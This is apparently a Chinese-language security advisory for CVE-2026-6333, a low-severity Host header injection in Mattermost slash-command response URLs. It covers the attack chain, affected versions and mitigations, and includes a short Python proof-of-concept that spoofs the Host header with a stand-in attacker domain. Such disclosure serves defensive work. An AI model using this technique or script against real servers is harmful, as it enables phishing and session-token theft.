CVE-2026-6333: Mattermost Host头注入漏洞

漏洞信息

漏洞编号

CVE-2026-6333

漏洞类型

主机头注入

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Mattermost

漏洞概述

Mattermost在特定版本中存在安全漏洞，主要涉及对自定义斜杠命令响应URL的构建过程。由于系统未能严格验证HTTP请求头中的Host字段，经过身份认证的攻击者可以利用此缺陷，通过注入伪造的Host头部，将斜杠命令的响应重定向至由攻击者控制的服务器。该漏洞虽然被评定为低危，但在特定交互场景下，可能引发钓鱼攻击或导致令牌泄露风险。

技术细节

该漏洞的根本原因在于Mattermost后端在生成自定义斜杠命令的响应链接时，直接信任了用户传入的HTTP Host头部，而未将其与服务器配置的允许域名列表进行比对。攻击者首先需要一个低权限的Mattermost账户。在向受影响端点发起请求时，攻击者将HTTP Host头部修改为恶意域名（如evil.com）。服务器处理请求后，会基于该伪造的Host生成回调URL或重定向地址。当合法用户或自动化客户端访问此响应时，会被引导至攻击者的服务器。虽然CVSS向量显示机密性影响为无，但在实际攻击链中，结合社会工程学，攻击者可利用此漏洞窃取用户的Session令牌或进行凭证钓鱼，造成实质性的安全威胁。

攻击链分析

STEP 1

步骤1：获取认证

攻击者注册或使用已有的低权限账户登录Mattermost系统。

STEP 2

步骤2：构造恶意请求

攻击者向自定义斜杠命令的API端点发送HTTP请求，并将请求头中的Host字段修改为攻击者控制的服务器地址（如evil.com）。

STEP 3

步骤3：服务器处理漏洞

Mattermost服务器接收到请求后，未对Host头部进行验证，直接使用该头部值构建响应URL（如回调地址）。

STEP 4

步骤4：重定向攻击

服务器返回包含恶意URL的响应给客户端。当用户点击或系统自动处理该链接时，会被重定向至攻击者的服务器，可能导致令牌窃取或钓鱼。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-6333: Mattermost Host Header Injection
import requests

def check_vulnerability(target_url, malicious_host):
    """
    Checks if the target is vulnerable by sending a request with a spoofed Host header.
    """
    headers = {
        "Host": malicious_host,
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/json"
    }
    
    # Example payload to trigger a slash command response
    payload = {
        "command": "/custom_command"
    }

    try:
        response = requests.post(target_url, headers=headers, json=payload, verify=False)
        
        # Check if the malicious host appears in the response (e.g., in a redirect URL or text)
        if malicious_host in response.text or malicious_host in response.headers.get('Location', ''):
            print(f"[+] Vulnerability Detected! Malicious host '{malicious_host}' found in response.")
            return True
        else:
            print("[-] Vulnerability not detected or Host header not reflected.")
            return False
            
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

if __name__ == "__main__":
    target = "https://mattermost.example.com/hooks/xxxxxxx" # Replace with actual endpoint
    evil_host = "attacker-controlled.com"
    check_vulnerability(target, evil_host)

影响范围

Mattermost 11.5.x <= 11.5.1

Mattermost 10.11.x <= 10.11.13

防御指南

临时缓解措施

在未进行版本升级前，建议管理员在反向代理层面实施严格的Host头部白名单策略，仅允许受信任的域名访问后端服务。此外，可以暂时禁用受影响版本中的自定义斜杠命令功能，以阻断攻击路径。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6333
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6333
3 Details https://www.cvedetails.com/cve/CVE-2026-6333/
4 VulDB https://vuldb.com/cve/CVE-2026-6333
5 Link https://mattermost.com/security-updates